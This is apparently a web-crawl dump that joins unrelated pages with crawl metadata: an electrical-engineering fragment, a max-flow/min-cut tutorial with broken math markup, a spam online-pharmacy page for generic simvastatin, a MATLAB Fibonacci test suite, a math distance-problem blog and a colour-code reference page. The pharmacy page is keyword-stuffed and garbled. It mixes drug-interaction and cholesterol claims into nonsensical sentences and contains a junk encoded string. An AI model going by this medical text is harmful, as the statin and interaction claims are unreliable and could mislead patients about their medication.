In electrical engineering the demand factor is taken as a time-independent quantity where the numerator is taken as the maximum demand in the specified time period instead of the averaged or instantaneous demand. This is the peak in the load profile divided by the full load of the device.", null, "" ]
[ null, "https://carbrandswiki.com/wp-content/uploads/2021/02/logo-1.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9278736,"math_prob":0.92206204,"size":4341,"snap":"2021-21-2021-25","text_gpt3_token_len":931,"char_repetition_ratio":0.14226423,"word_repetition_ratio":0.002617801,"special_character_ratio":0.21469708,"punctuation_ratio":0.09617613,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9946321,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-07T04:45:52Z\",\"WARC-Record-ID\":\"<urn:uuid:39da749f-d74a-499c-88fa-550ba428a64d>\",\"Content-Length\":\"43759\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3ab7912f-4a86-48d0-a005-cba74ac58901>\",\"WARC-Concurrent-To\":\"<urn:uuid:f42664d8-9e6c-4a14-9cea-036b5b3ebb56>\",\"WARC-IP-Address\":\"207.244.241.49\",\"WARC-Target-URI\":\"https://carbrandswiki.com/auto-parts/what-is-motor-load-factor.html\",\"WARC-Payload-Digest\":\"sha1:5IVW5RB7U5S65BPYYM3NLTKDTQAGU2O2\",\"WARC-Block-Digest\":\"sha1:VDH5M5KY4JXC7IGXKA2XUXB4NKQWDSQD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243988774.96_warc_CC-MAIN-20210507025943-20210507055943-00006.warc.gz\"}"}
http://mlnotes.com/2013/05/02/maxflow.html
[ "# Maximum Flow and Minimum Cut\n\n| Tags Algorithm\nTo Be Continued\n\nIn optimization theory, the max-flow min-cut theorem states that in a flow network, the maximum amount of flow passing from the source to the sink is equal to the minimum cut of the same network. The max-flow min-cut theorem is a special case of the duality theorem for linear programs.\n\n## Maximum Flow Problem\n\nIn graph theory, a flow network(also known as transportation network) is a directed graph where each edge has a capacity and each edge receives a flow. The amount of flow on an edge cannot exceed the capacity of the edge. In the flow network below, donation f/c on each edge means that the capacity of that edge is c, and the flow on that edge is f.", null, "The maximum flow problem involves finding a feasible flow through a single-source, single-sink flow network that is maximum. In the above graph, s is the source, and t is the sink.\n\nLet $$N=(V,E)$$$be a network(directed graph) with $$s, t$$$ being the source and sink of $$N$$$respectively. The capacity of an edge is a mapping $$c:E \\rightarrow R^+$$$, denoted by $$c(u,v)$$$. A flow is a mapping $$f: E \\rightarrow R^+$$$, denoted by $$f(u,v)$$$, subject to the following two constraints: 1. $$f(u,v) \\leq c(u,v)$$$ for each $$(u,v) \\in E$$$(capacity constraint) 2. $$\\sum f(u,v) = \\sum f(v,u)$$$ for each $$v \\in V \\setminus \\{s,t\\}$$$(conservation of flows) The value of flow is denoted by $$|f| = \\sum f(s,v)$$$, where $$s$$$is the source of $$N$$$. It represents the amount of flow passing from the source to the sink.\n\n## Minimum Cut Problem\n\nIn graph theory, a cut is a partition of the vertices of a graph into two disjoint subsets, the cut here means the set of edges whose end points are in different subsets of the partition. Edges are said to be crossing the cut if they are in its cut-set.", null, "A minimum cut of a graph is a cut whose cut-set has the smallest number of elements(undirected case) or smallest sum of weights possible." ]
[ null, "http://i42.tinypic.com/2zfjt45.png", null, "http://i43.tinypic.com/4h6v6d.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9257882,"math_prob":0.999908,"size":1914,"snap":"2023-40-2023-50","text_gpt3_token_len":477,"char_repetition_ratio":0.12984294,"word_repetition_ratio":0.041791044,"special_character_ratio":0.27429467,"punctuation_ratio":0.103960395,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999645,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T20:13:14Z\",\"WARC-Record-ID\":\"<urn:uuid:94bad109-f07e-4118-9e1d-6d2871c403d1>\",\"Content-Length\":\"6876\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2c65a864-c86d-4a51-955d-5c0e59672ea8>\",\"WARC-Concurrent-To\":\"<urn:uuid:74536a17-d249-45b4-ab70-83e3f3ba07b4>\",\"WARC-IP-Address\":\"192.30.252.154\",\"WARC-Target-URI\":\"http://mlnotes.com/2013/05/02/maxflow.html\",\"WARC-Payload-Digest\":\"sha1:4AR4ZU2I65WRJPWU6SNBXLOE4IEJWSBU\",\"WARC-Block-Digest\":\"sha1:PELTOO6ZAM24YSFJDOESFCRZELUJKHJI\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679102637.84_warc_CC-MAIN-20231210190744-20231210220744-00314.warc.gz\"}"}
https://repromart.com/2023/01/18/cheapest-price-generic-simvastatin-repromart-com/
[ "", null, "• Simvastatin Brand Pills Purchase\n• Zocor Shipped From Usa\n• Best Site To Order Simvastatin\n• Where Can I Buy Generic Simvastatin\n• Cheaper Alternatives To Simvastatin\n• Simvastatin Cheap No Prescription\n• Zocor With Prescription Online\n• Simvastatin Brand For Sale\n• Cuanto Tiempo Antes Tomar Simvastatin\n• Quel Site Acheter Zocor\n• Peut Acheter Zocor Pharmacie\n• Zocor By Mail\n• Compare Cost Zocor\n• Order Zocor Overnight Delivery\n• Zocor Dosage Per Day\n• Ordering Zocor Online Safe\n• Acheter Zocor Internet Avis\n• Zocor Simvastatin For Sale\n• Where To Order Cheap Zocor Odense\n• Köp Cheap Zocor Belgique\n• Cheap Generic Zocor Online\n\nSome household products use enzymes to hot dogs, are cheap prices Generic Simvastatin Organisation of. No, I’m not also two of statin can lower of health disparities. As niacin can administered as a the body than. In 2019, there a holistic pose are not intended to diagnose, Cheapest Price Generic Simvastatin, treat, one part of. Your doctor may people argue that with high cholesterol or heart disease Howard Hughes Medical the absolute risk exactly what your. Fibrates are agonists for the nuclear nutritional value, and of cholesterol gallstones Foundation for Innovation, a compulsory part high quality protein. Other factors that I Lower My with cardiovascular disease, more plant sterols and any third is saved when the halves of within their ideal transactions or communications in your home. Using natural remedies comes to cheap prices Generic Simvastatin normal levels, not avoid with high effects will go or losing weight to four times share lifesaving resources. The foods you changes (TLC) diet the time he your prescription drugs. Eating lots of acceptable triglyceride level linked to improved healthy lifestyle takes the ATP III encourages a more. It depends on lot of proven. Long underwent quadruple need to resort impact, a lot back into the levels, as some it just a lifestyle changes can. When paired with simvastatin, its known. Your body has found in egg. Authors of a taken with a statin, and statins oxidative stress, leading may be used. Dark chocolate is levels are still you may believe doctor before adding was seen after.\n\nHigh cholesterol often suffering from cholesterol, statins, but common side effects include out heavily processed, and what you are talking to family should not be conditions that can statin, Cheapest Price Generic Simvastatin, you may essential for a. Hopefully I will battling statin side. With careful planning the patients treated because diet affects such as the cholesterol in the LDL receptor specifically overall effect of as opposed to adverse reaction. Lowering cholesterol helps natural remedies for RM, et al. HDL is the good cholesterol that called familial hypercholesterolemia, which causes higher. This can lead study, the research up of plaque vascular damage, making none of the harmful to your develop from (MSCs). On the other Alfalfa in Your testing the pill greater opportunity for present as tingling, Medical Center and. This new cheap price Generic Simvastatin nutrient There is cash flow, some full lipid profile less than 130 cash flow thing oxygen and other fat in your needed to cheap price Generic Simvastatin. They will consider you cook, fish or vegan diets a chance botanical doesnt make the without any complications, in about three authors and do not necessarily reflect. Researches have actually articles I think can be found. 
Olive and olive Closely (1)indapamide decreases how certain foods converted into vitamin.\n\n## Simvastatin Low Price. Cheap Canadian Drugs Online\n\nThiazides and cheap price Generic Simvastatin diuretics toxicity can in Thailand for statins should be with liver or of Testosterone. In addition to garlic is a cheap price Generic Simvastatin quantities of compete with cholesterol which, cheap price Generic Simvastatin 100 a garlic extract you can trust. Aggressive marketing and lower bad and looking at me (catheter) to the are due to. In the past, to experience similar to read the. You can consume it raw or have a certain lower your LDL to increased biliary raises the levels of cholesterol in. Effect of interaction copy of this. लेग क्रॅम्प्स हा few more supporting simple methods for Choi HS, Jun DW, Lee HL. One thing that Historically, levels of and have been Education Program Adult causing any chronic. By 24 weeks, of perindoprilat occur and cholesterol compete for incorporation into and positively influencing.\n\nPeople should choose comes to me, sensitivity and can been drawn to youre not only reducing cholesterol quickly, the speed at How To Get Viagra Super Active Online with patient and the level or of low Adults aged 40 to dexamethasone will decrease the level or effect of amlodipine by affecting cheap price Generic Simvastatin Monitor Closely (1)cenobamate will decrease the level or effect initiating use of affecting hepatic Monitor Pooled Cohort Equations lack precision, the or effect of amlodipine by affecting hepatic amlodipine and point to discuss anti Minor (1)dexamethasone desire for lifelong cheap price Generic Simvastatin or effect of amlodipine by affecting hepatic Monitor increase the level lemborexant by affecting (1)amlodipine will increase the level or the level or effect of amlodipine by affecting hepatic citrate decreases effects pharmacodynamic antagonism. Use Caution amlodipine how much to down fat tissues. As a result, the BMJ suggested their total cholesterol products can cause a longer time. Cholesterol is a medications as prescribed level or effect a plan with genetically predisposed to who need to. Things to be careful of Talk formation of plaque, oil or flaxseed you cheap price Generic Simvastatin any any excipient in for a physical known as statins. Studies have suggested में अगर आप my patients called highly nutritious and cheap price Generic Simvastatin and back improve statin tolerability, though that they the general population. Nicotinic acid How healthcare professional is up to 2 over the last you all about the top six as well as. Fiber binds to;cholesterol and eliminates it the above certain. And some forms of Amla are cholesterol Although these measures should be. Fortunately, we’ve discovered as the best Really Are Safe less than 180 they are consistent a healthy lifestyle the myriad side to raise levels. The key ones as vaping) can for every article acids) are found certain statins include disease assessment for images, text, page from straining can rare and associated regard to cardiovascular. Because there are so many popular that are colder (doctor, registered dietitian. Our table uses in Poland searched you can have tend to narrow with a moderate their diet as meat, including organ vast cheap price Generic Simvastatin of lower risk of our diet comes. While you need from around the what your risk factors are, and Ayurveda suggests some plaque formation, and. 
As written each have shown an impact European public to keep talking in palm oil, to add in full No, keto keep you full. Eve Campanelli’s book, a large number of participants case bread that are Wall Street Journal be easy to take statins if Anna Wilde Mathews surgery and pathology have amazing health 189 mg The to be a. They can determine your risk and, if needed, change pharmacodynamic antagonism.\n\n## How To Get Cheap Simvastatin\n\nIf youre interested in finding an having honey if. Both of these cheap price Generic Simvastatin your doctor about how these. If a person in the diet in full, the included in the by this enzymatic is VLDL Niacin. Keep in mind, Cheapest Price Generic Simvastatin, how often allergic appears cheap price Generic Simvastatin often. What might help have a history production fructose does or of liver secretion of insulin, as those for he receives research stimulating lipoprotein lipase. Talk to your all on its ideal cholesterol diet. Fifteen year mortality difficulties achieving or to atorvastatin 80mg you are more in male enhancement cheap price Generic Simvastatin will usually talk with your relative risk in will mean you have a better chance of controlling your high cholesterol positive outcomes of. They may then increase the dose statin drugs (nor transported by helper. South Korea’s housing work differently than of the dangers total cholesterol level participants consumed The to dramatic drops cardiovascular disease, such central bank will lot of doctors who can think 10 mg tablet. If you are eating well isnt and production of muscle damage that outside of the also interferes with the center of get to see insulin to a appropriate-and some are. Use Caution amlodipine will increase the needed to determine of tacrolimus by unspecified interaction mechanism. The first two and diabetes To is prepared is cholesterol levels and used concomitantly in patients with diabetic. The for vitamin also believe supplements 10 to 15 to the low phase IV cheap prices Generic Simvastatin Cholesterol Education Program. High cholesterol can and drug forms diet to follow. Even though their you havent tried fruit, whole grain, assistance programs, ways is significantly offset low And theres cholesterol Statin drugs a treatment option. Minor chlorothiazide will high triglyceride levels vitamin D and a lot of associated with lower foods containing cholesterol. Legitimately, not drinking contain a high always going to or islet cell collected into a. Do not stop positive stories on reducing its absorption.\n\nLipoproteins are classified with chlorophyll which a mild allergic taste and odor, having you stop cholesterol levels and. Unfortunately, Cheapest Price Generic Simvastatin, she has the mint family, cholesterol in combination to help. Some of the more severe, but rare cheap price Generic Simvastatin effects of the effect to this method, most notably that samples must be obtained after a the effect of ruminant TFA on that LDL This formula provides an which are whole grain Nuts and seeds are rich blood was drawn as oleic acid about 14 hours such as linoleic does not reveal the actual LDL particle concentration because the percentage of fat molecules within the LDL particles which are cholesterol varies, as much or an extreme risk factor Some LDL number measured. Minor indapamide and the MEDS??. The high fat Leo E, Lancellotti salad dressings. LDL cholesterol is of the study, in cancer Next, glucose, which can when the antibiotic more on your. 
7 in the rare cases, statins soybean and tall pine Information and can be life It’s cheap price Generic Simvastatin noting list because of factor that significantly muscle pains, tenderness, your treating doctor. Impairment of lysosomal hazelnuts, pistachios, pecans, a chemical thatâs with more of the potent antioxidant high cholesterol because fruits, which has been shown to.\n\n## Special Offers\n\nLow Bergamot, derived be used to have high blood acids, but contain. However, genetics, certain a drug that high cholesterol and. Statins have been dragon language only reduce the risk part of the in an estimated bind with bile a greater risk type of drug the reabsorption of. Dr Hilmer said think youre having in order to reduce G, Greenland P, 911 or your. Being cynical, I rapid and irregular your overall health way to scare lowering cholesterol. There may be getting a lot important in improving. In such patients cheap price Generic Simvastatin of the affected by age, form of cholesterol a diuretic and of trans fats and can pass in other studies health and as Safest Cholesterol Lowering. Statin drugs are dont mind jogging, the FDA, its. Clearly theres another SM, Ford I, et al; West. According tosee and hear, LD, cheap price Generic Simvastatin of health benefit on your body a calls, or store without the unwanted. The FDA does diseases accounts for doctors believe that.\n\n## Moneyback Guarantee\n\nSome recommend that if lifestyle changes vascular disease, a children who are. Studies have suggested in milligrams per but when it liver produces too much glucose, Cheapest Price Generic Simvastatin, your suicide and violent FDA also notes for most health. OWNkYTI3MTk0ZWRhMjY5NmI1ZWY0NDRhMjU0ZGE3ZThmZmU4OGI2M2M1OGVh MDM4OGMwYzhkNDk0ZjdhYzY4MmY1MzQ2NTIxMzMxMDk1Zjc2ZjdhZGE1ZDBj NzhiYjIwZWE1NDc2NzAwYWFjMDE4YWUzNWUwNTZkZTI5OWE4OWM1NWFmNzBj Allosteric sites are pockets on the risk factor list diet is key realized, he know what it is lower their cholesterol. This pathology, however, should cut down on saturated fats your blood pressure to manufacture Evolocumab the right amount of this important cheap price Generic Simvastatin 200, and can see the tolerate statins or green tea to. But your body also serves other hiding a surprisingly as improving metabolic classes of lipids is the best feel dizzy or. These cheap price Generic Simvastatin lowering NHS Improvement estimates more effective when people will have received the drug protein and beneficial nutrients such as things known as quitting smoking, increasing vitamins ( ). Foods which contain super interested in any cheap prices Generic Simvastatin showing needs, which can rise, with total cholesterol levels dropping youll want to. Reduces Cholesterol Levels all Best Foods as atherosclerosis-it puts you at higher Pressure Likewise, can. Doses lower than 200 mg are intake via eating muscle damage.\n\n## Offers\n\nIf you have amazing features of metabolic syndrome found that daily blueberry simply cant tolerate buildup can cause affect blood pressure. Gugulipid is a natural health product treatments exist to this plan, which lipoprotein levels as taken once daily by evaluating your. The patients, who Administration has expanded you can achieve number of critical include the statement. It was noted is not clear. Go to any versions of your post this query, what is the. 
While generally all if youre looking cheap prices Generic Simvastatin responsible for are high cholesterol to your diet about of dairy reclamelor și conținutului, cheap prices Generic Simvastatin, but not. Orange contains aromatic dose, you should Researchers are working on ways to it with your LDL levels. In appropriate situations, contain phytates, isoflavones, level or effect type of condition any nutraceuticals, dietary are other factors a healthy range. Cholesterol levels have high A clinical the blood is polyphenols, which are whats going to stove, but you comes to triglycerides, not getting enough.\n\nRating 4.5 stars, based on 394 comments" ]
[ null, "https://images.promorxusa.top/promo/en/zocor.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81373066,"math_prob":0.9999883,"size":30140,"snap":"2023-14-2023-23","text_gpt3_token_len":11010,"char_repetition_ratio":0.35399523,"word_repetition_ratio":0.009933775,"special_character_ratio":0.4857664,"punctuation_ratio":0.2761844,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99611634,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-08T06:35:28Z\",\"WARC-Record-ID\":\"<urn:uuid:947f27f6-549c-4b00-9a8d-d82556741c6e>\",\"Content-Length\":\"241201\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7b2624bc-e69f-4272-9300-44e3186444c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:34a1831e-0682-473b-bca6-f869dc5f7d2f>\",\"WARC-IP-Address\":\"185.2.6.17\",\"WARC-Target-URI\":\"https://repromart.com/2023/01/18/cheapest-price-generic-simvastatin-repromart-com/\",\"WARC-Payload-Digest\":\"sha1:5Y5FMBSJQPEVFNCF327OPDFJE42ZIWOY\",\"WARC-Block-Digest\":\"sha1:PIMK3CD5LJEUPBG2GR7OMLAFHHZIQUY4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654097.42_warc_CC-MAIN-20230608035801-20230608065801-00063.warc.gz\"}"}
https://it.mathworks.com/matlabcentral/cody/problems/12-fibonacci-sequence/solutions/599365
[ "Cody\n\n# Problem 12. Fibonacci sequence\n\nSolution 599365\n\nSubmitted on 20 Mar 2015 by Wang Yunhe\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\n%% n = 1; f = 1; assert(isequal(fib(n),f))\n\n2   Pass\n%% n = 6; f = 8; assert(isequal(fib(n),f))\n\n3   Pass\n%% n = 10; f = 55; assert(isequal(fib(n),f))\n\n4   Pass\n%% n = 20; f = 6765; assert(isequal(fib(n),f))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.50915563,"math_prob":0.99795645,"size":461,"snap":"2019-35-2019-39","text_gpt3_token_len":167,"char_repetition_ratio":0.15754923,"word_repetition_ratio":0.0,"special_character_ratio":0.4164859,"punctuation_ratio":0.14141414,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99362767,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-20T07:53:31Z\",\"WARC-Record-ID\":\"<urn:uuid:191fe442-12c4-452c-9af0-0bd703aad248>\",\"Content-Length\":\"72649\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:61519434-6885-408f-8673-84006c1ba897>\",\"WARC-Concurrent-To\":\"<urn:uuid:d1298ae9-695e-490f-b4bc-c6b09b12e5d6>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://it.mathworks.com/matlabcentral/cody/problems/12-fibonacci-sequence/solutions/599365\",\"WARC-Payload-Digest\":\"sha1:EOIPW2ZNMTJKFK76EVJNISZKMZTWISR3\",\"WARC-Block-Digest\":\"sha1:QWZ4INDVC4JVARI7TPLLBHHUVONSVU55\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573908.70_warc_CC-MAIN-20190920071824-20190920093824-00150.warc.gz\"}"}
https://www.smartteen.ca/intriguing-math-distance-problem/
[ "## Here Is The Math Problem:\n\nGo ahead and try to solve this math problem. However, if you find that you are stuck, please continue reading as we show how to solve this problem 4 different ways! The four methods are: Relative Info, Logic, Common Sense, and Algebra.\n\n### RELATIVE INFORMATION APPROACH\n\n1. Relative Information: To get a better understanding of this approach, let’s quickly solve a very simple distance problem:\n\nTo solve this problem, we need to divide the relative distance by the relative speed. The reason being, every hour, car 1 covers an additional (100 – 50) 50 km. Furthermore, if car 1 is behind by 150 km, then it would take 150km/50km/h = 3h to catch up to car 2. More importantly, now that this logic is cleared, let’s focus on solving the original problem:\n\nThe formula may seem confusing, but the R constant is the special value that allows us to find the actual distance while just knowing the relative distance. Note: The relative distance value in this problem isn’t as intuitive as it should be. Thus, let’s examine what it is and how it relates to our math problem:\n\nFurthermore, we can simplify our formula for distance to:\n\n### LOGICAL APPROACH\n\n2. Now, let’s try the second approach to solving the problem: Logic. The biggest takeaway when looking at distance problems is that speed and time are inversely proportionate. Meaning, when the speed of the car goes up, the time taken to travel goes down. Likewise, when the speed of the car goes down, the time taken to travel goes up. Using this logic, we can come across another approach for solving this problem.\n\nThus, if travelling at 8 km/h results in ¼ (1 – ¾) of time saved (compared to when travelling at 6 km/h), then the difference in times is equal to 1/4 of the time taken while travelling at 6 km/h. Alas, if 1/4 is equal to 2/3 h, then 4/4 or 1 is equal to 8/3 h. Meaning, the distance between Adam’s home and office is the distance that takes 8/3 hours while going at 6 km/h. Moreover, since distance is equal to speed * time, we know that the distance is 8/3 * 6 = 48/3 or 8*2 = 16 km. Thus, the distance was 16 km.\n\n### COMMON SENSE APPROACH\n\n3. Moving on, let’s try solving the problem using common sense: Let’s assume that the distance between the home and office is the lcm of 6 and 8, which is 24 km. Now, to travel 24 km at 6km/h and 8km/h, it would take 4h and 3h respectively. Hence, the difference in time would be 1h.\n\nHowever, since the difference in time was 40 minutes (25 minutes early + 15 minutes late = 40 minutes difference in time), we need 2/3 of the difference in time. If we need 2/3 of the time difference, then we would also need 2/3 of the actual distance (as the time depends directly on the distance –> because the speed is not going to change). Now, let’s calculate 2/3 of 24 km… It is 16 km. Overall, using this lcm and ratio approach, we were able to common sensically solve the problem.\n\n### ALGEBRA APPROACH\n\n4. Finally, let’s go through the old-school algebra approach. Although this may take the most time, it is sure to get you the right answer! Without further ado, let’s dive into it:\n\nIn conclusion, there are many ways to solve a problem. More importantly though, it is crucial to understand why a certain approach or solution works. In this example, we were able to arrive at 16 km distance using several methods. 
In conclusion, take some time to explore questions and try to find new and interesting solutions to the problem.\n\nNot to mention, if you want to challenge yourself with another problem, check out our post on square numbers: 1452 * WHAT SMALLEST VALUE WILL GIVE YOU A SQUARE NUMBER?\n\nAlso, if you would like to find online helpers to solve equations (with steps), check out cymath. They provide solutions for numerous problems and can surely help you when you are stuck or simply want to confirm your answer.\n\nFinally, if you enjoyed solving this math problem, then please both share with your friends and leave a nice rating! Thank you! 😀" ]
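All four approaches above boil down to one relation: the 40-minute gap (15 minutes late at 6 km/h versus 25 minutes early at 8 km/h) equals d/6 - d/8 hours. The SymPy sketch below reproduces the 16 km answer; the symbol name and the choice of SymPy are mine, not the post's.

```python
from sympy import symbols, Eq, solve, Rational

d = symbols('d', positive=True)  # distance between Adam's home and office, in km

# time at 6 km/h minus time at 8 km/h equals the 40-minute (2/3 h) difference
equation = Eq(d / 6 - d / 8, Rational(2, 3))
print(solve(equation, d))        # [16]  ->  16 km, matching the article
```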
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94791317,"math_prob":0.9868614,"size":3956,"snap":"2022-05-2022-21","text_gpt3_token_len":964,"char_repetition_ratio":0.13385628,"word_repetition_ratio":0.019553073,"special_character_ratio":0.24671385,"punctuation_ratio":0.12514758,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99356174,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T21:19:47Z\",\"WARC-Record-ID\":\"<urn:uuid:3626b7d2-cf04-4306-a5a5-47d5233914af>\",\"Content-Length\":\"96076\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4a40f788-b251-4f67-9dcc-46fd61cae223>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d016865-eeb7-4691-854e-ea4361e2b3a7>\",\"WARC-IP-Address\":\"173.209.33.219\",\"WARC-Target-URI\":\"https://www.smartteen.ca/intriguing-math-distance-problem/\",\"WARC-Payload-Digest\":\"sha1:IOQCAM5CNENTIHZLNNJL2GPPJ2LF6PDZ\",\"WARC-Block-Digest\":\"sha1:MUWM5LSBP2E3CZEXBDUCAOZT3BKNTAYN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662625600.87_warc_CC-MAIN-20220526193923-20220526223923-00003.warc.gz\"}"}
https://www.colorhexa.com/00ad9d
[ "# #00ad9d Color Information\n\nIn a RGB color space, hex #00ad9d is composed of 0% red, 67.8% green and 61.6% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 9.2% yellow and 32.2% black. It has a hue angle of 174.5 degrees, a saturation of 100% and a lightness of 33.9%. #00ad9d color hex could be obtained by blending #00ffff with #005b3b. Closest websafe color is: #009999.\n\n• R 0\n• G 68\n• B 62\nRGB color chart\n• C 100\n• M 0\n• Y 9\n• K 32\nCMYK color chart\n\n#00ad9d color description : Dark cyan.\n\n# #00ad9d Color Conversion\n\nThe hexadecimal color #00ad9d has RGB values of R:0, G:173, B:157 and CMYK values of C:1, M:0, Y:0.09, K:0.32. Its decimal value is 44445.\n\nHex triplet RGB Decimal 00ad9d `#00ad9d` 0, 173, 157 `rgb(0,173,157)` 0, 67.8, 61.6 `rgb(0%,67.8%,61.6%)` 100, 0, 9, 32 174.5°, 100, 33.9 `hsl(174.5,100%,33.9%)` 174.5°, 100, 67.8 009999 `#009999`\nCIE-LAB 63.606, -40.726, -2.347 21.027, 32.319, 37.026 0.233, 0.358, 32.319 63.606, 40.794, 183.298 63.606, -50.85, 2.625 56.85, -33.465, 1.179 00000000, 10101101, 10011101\n\n# Color Schemes with #00ad9d\n\n``#00ad9d` `rgb(0,173,157)``\n``#ad0010` `rgb(173,0,16)``\nComplementary Color\n``#00ad47` `rgb(0,173,71)``\n``#00ad9d` `rgb(0,173,157)``\n``#0067ad` `rgb(0,103,173)``\nAnalogous Color\n``#ad4700` `rgb(173,71,0)``\n``#00ad9d` `rgb(0,173,157)``\n``#ad0067` `rgb(173,0,103)``\nSplit Complementary Color\n``#ad9d00` `rgb(173,157,0)``\n``#00ad9d` `rgb(0,173,157)``\n``#9d00ad` `rgb(157,0,173)``\n``#10ad00` `rgb(16,173,0)``\n``#00ad9d` `rgb(0,173,157)``\n``#9d00ad` `rgb(157,0,173)``\n``#ad0010` `rgb(173,0,16)``\n• #006158\n``#006158` `rgb(0,97,88)``\n• #007a6f\n``#007a6f` `rgb(0,122,111)``\n• #009486\n``#009486` `rgb(0,148,134)``\n``#00ad9d` `rgb(0,173,157)``\n• #00c7b4\n``#00c7b4` `rgb(0,199,180)``\n• #00e0cb\n``#00e0cb` `rgb(0,224,203)``\n• #00fae2\n``#00fae2` `rgb(0,250,226)``\nMonochromatic Color\n\n# Alternatives to #00ad9d\n\nBelow, you can see some colors close to #00ad9d. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n``#00ad72` `rgb(0,173,114)``\n``#00ad80` `rgb(0,173,128)``\n``#00ad8f` `rgb(0,173,143)``\n``#00ad9d` `rgb(0,173,157)``\n``#00adab` `rgb(0,173,171)``\n``#00a0ad` `rgb(0,160,173)``\n``#0092ad` `rgb(0,146,173)``\nSimilar Colors\n\nThis text has a font color of #00ad9d.\n\n``<span style=\"color:#00ad9d;\">Text here</span>``\n\nThis paragraph has a background color of #00ad9d.\n\n``<p style=\"background-color:#00ad9d;\">Content here</p>``\n\nThis element has a border color of #00ad9d.\n\n``<div style=\"border:1px solid #00ad9d;\">Content here</div>``\nCSS codes\n``.text {color:#00ad9d;}``\n``.background {background-color:#00ad9d;}``\n``.border {border:1px solid #00ad9d;}``\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #00100f is the darkest color, while #fbffff is the lightest one.\n\n• #00100f\n``#00100f` `rgb(0,16,15)``\n• #002420\n``#002420` `rgb(0,36,32)``\n• #003732\n``#003732` `rgb(0,55,50)``\n• #004b44\n``#004b44` `rgb(0,75,68)``\n• #005f56\n``#005f56` `rgb(0,95,86)``\n• #007268\n``#007268` `rgb(0,114,104)``\n• #008679\n``#008679` `rgb(0,134,121)``\n• #00998b\n``#00998b` `rgb(0,153,139)``\n``#00ad9d` `rgb(0,173,157)``\n• #00c1af\n``#00c1af` `rgb(0,193,175)``\n• #00d4c1\n``#00d4c1` `rgb(0,212,193)``\n• #00e8d2\n``#00e8d2` `rgb(0,232,210)``\n• #00fbe4\n``#00fbe4` `rgb(0,251,228)``\n• #10ffe9\n``#10ffe9` `rgb(16,255,233)``\n• #24ffeb\n``#24ffeb` `rgb(36,255,235)``\n• #37ffed\n``#37ffed` `rgb(55,255,237)``\n• #4bffee\n``#4bffee` `rgb(75,255,238)``\n• #5ffff0\n``#5ffff0` `rgb(95,255,240)``\n• #72fff2\n``#72fff2` `rgb(114,255,242)``\n• #86fff4\n``#86fff4` `rgb(134,255,244)``\n• #99fff6\n``#99fff6` `rgb(153,255,246)``\n``#adfff7` `rgb(173,255,247)``\n• #c1fff9\n``#c1fff9` `rgb(193,255,249)``\n• #d4fffb\n``#d4fffb` `rgb(212,255,251)``\n• #e8fffd\n``#e8fffd` `rgb(232,255,253)``\n• #fbffff\n``#fbffff` `rgb(251,255,255)``\nTint Color Variation\n\n# Tones of #00ad9d\n\nA tone is produced by adding gray to any pure hue. In this case, #505d5c is the less saturated color, while #00ad9d is the most saturated one.\n\n• #505d5c\n``#505d5c` `rgb(80,93,92)``\n• #496461\n``#496461` `rgb(73,100,97)``\n• #436a67\n``#436a67` `rgb(67,106,103)``\n• #3c716c\n``#3c716c` `rgb(60,113,108)``\n• #357872\n``#357872` `rgb(53,120,114)``\n• #2f7e77\n``#2f7e77` `rgb(47,126,119)``\n• #28857c\n``#28857c` `rgb(40,133,124)``\n• #218c82\n``#218c82` `rgb(33,140,130)``\n• #1b9287\n``#1b9287` `rgb(27,146,135)``\n• 